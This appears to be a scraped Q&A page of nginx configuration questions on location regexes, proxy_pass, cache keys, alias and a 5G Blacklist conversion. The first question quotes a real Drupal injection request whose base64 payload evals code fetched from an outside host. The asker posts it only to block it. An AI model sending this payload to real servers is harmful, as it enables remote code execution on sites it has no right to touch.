this is a common virus that hits with a post URI like:
/?q=user/password&name%5B%23post_render%5D%5B0%5D=array_map&name%5B%23suffix%5D=eval%28base64_decode%28%22ZXZhbChmaWxlX2dldF9jb250ZW50cygiaHR0cDovL2Zvcm1hbi1kZXNpZ24uY29tL3BsdWdpbnMvZ2RfZm9udHMvaW5kb3hlLnR4dCIpICk7%22%29%29%3B%2F%2F&name%5B%23markup%5D=assert&name%5B%23type%5D=markup HTTP/1.1" 200 21803 "https://example.com/
How to prevent it from going through nginx?
I tried
location ~* base64 {
return 404;
}
to put down any request with base64 in it but it doesn't work. Please help and give me the right nginx regex rule. (I can't modify the app codebase or update the system).
if ($query_string ~ "base64") {
return 404;
}
Related
I am trying to exclude some paths in my nginx proxypass and want everything else to go to my proxypass.
i.e I dont want to give proxy_pass to any url which starts with 'tiny' or 'static', but want everythign else to go to my proxypass location.
and I am using following regex to achieve this:
~ ^((?!tiny|static).)*$
But I always get 404 error.
If I navigate to following url in browser
localhost:8080/xyz
I want it to go to
localhost:8000/api/tiny/records/xyz
Can someone please help me in pointing out what is the issue ?
Here is my full nginx conf file:-
server {
listen 8080;
server_name localhost;
location ~ ^((?!tiny|static).)*$ {
proxy_pass http://localhost:8000/api/tiny/records/$1;
}
location / {
proxy_pass http://localhost:8000;
}
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root html;
}
}
Thanks a lot.
You are missing a / and have the * in the wrong place. The regular expression should be:
^(/(?!tiny|static).*)$
But you do not need to use a regular expression with a negative lookahead assertion. Instead, place a normal regular expression on the other location block.
For example:
location / {
proxy_pass http://localhost:8000/api/tiny/records/;
}
location ~ ^/(tiny|static) {
proxy_pass http://localhost:8000;
}
I am trying to match specific parts of $uri using proxy_cache_key in nginx 1.12 for these requests where different file names (with no arguments) actually have the same file contents. :(
2018-04-02T21:25:37+00:00 MISS /bein1/1/media_w1751476191_2333.ts
2018-04-02T21:25:37+00:00 MISS /bein1/1/media_w2137194067_2333.ts
2018-04-02T21:25:38+00:00 MISS /bein1/1/media_w1023873154_2333.ts
I have tried the following:
location ~ ^/bein1/(.*)/media_(.*)_(.*).(ts)$ {
proxy_cache_valid 200 302 60s;
proxy_cache_key "/bein1/$1/media_$3.ts";
proxy_pass http://origin;
add_header "X-Hls-Cache-Status" "Cached TS";
}
But I still could not match the specified URI.
Can any one can help me please?
Try with something like this:
location ~ ^/bein1/([-_a-zA-Z0-9/]+)/media_([-_a-zA-Z0-9/]+)_([0-9]+).ts$ {
proxy_cache_key "/bein1/$1/media_$3.ts";
proxy_cache_valid 200 302 60s;
proxy_pass http://origin;
}
I have the following locations in my nginx config:
server {
listen 80;
server_name localhost;
location ~ ^/(?!api)(.*)/api {
alias /var/www/api/$1;
}
location /api {
alias /var/www/api/latest;
}
I am trying to match /api as the latest version, and /<version>/api as anything else. The non regex location is working fine, but I am getting a 403 on the other location.
I don't think it is anything to do with the file and permissions that are being served, as I get a 403 if I try to access
/latest/api
even though these are the same files that are served by
/api
Does anyone have an ideas about why I am getting a 403?
The nginx error is:
directory index of "/var/www/api/latest" is forbidden, client:
172.17.0.1, server: localhost, request: "HEAD /latest/api/ HTTP/1.1",
host: "localhost"
The problem is not with the regular expression, but with the use of the alias directive within a regular expression location. See this document for more.
On a related note, rather than using a negative lookahead assertion, you should use the ^~ modifier on the prefix location. See this document for more.
For example:
location ~ ^(/[^/]+)/api(.*)$ {
alias /var/www/api$1$2;
}
location ^~ /api {
alias /var/www/api/latest;
}
I'm trying to covert 5G Blacklist to from Apache(.htaccess) to Nginx(.conf). There is a line in .htaccess that is causing problem:
<IfModule mod_alias.c>
RedirectMatch 403 (\,|\)\+|/\,/|\{0\}|\(/\(|\.\.\.|\+\+\+|\||\\\"\\\")
</IfModule>
I have converted it to .conf as follows:
Code included in http block
map $request_uri $bad_uri {
default 0;
"~*(\,|\)\+|/\,/|\{0\}|\(/\(|\.\.\.|\+\+\+|\||\\\"\\\")" 1;
}
Code included in server block
if ($bad_uri) {
return 403;
}
As far as I know both Apache and Nginx use perl regex so no change should be required when converting from former to the latter. However, following URI is giving 403 on Nginx but working fine on Apache:
www.example.com/some,url,with,commas
www.example.com/?q=some,url,with,commas
Finally found the issue.
In Apache RedirectMatch matches only the url without query string whereas $request_uri in nginx maps to url with query string.
So the correct code for Nginx is:
map $uri $bad_uri {
default 0;
"~*(\,|\)\+|/\,/|\{0\}|\(/\(|\.\.\.|\+\+\+|\||\\\"\\\")" 1;
}
i have this URI /orls/myservice/f?p=4550 and the following location
location ~ "^/(.+)/myservice/f?p=(.+)$" {
.....
}
nginx is returning a 404 not found. the problem might come from the ? so i tried \? but i'm still getting the same error. Can anyone help ?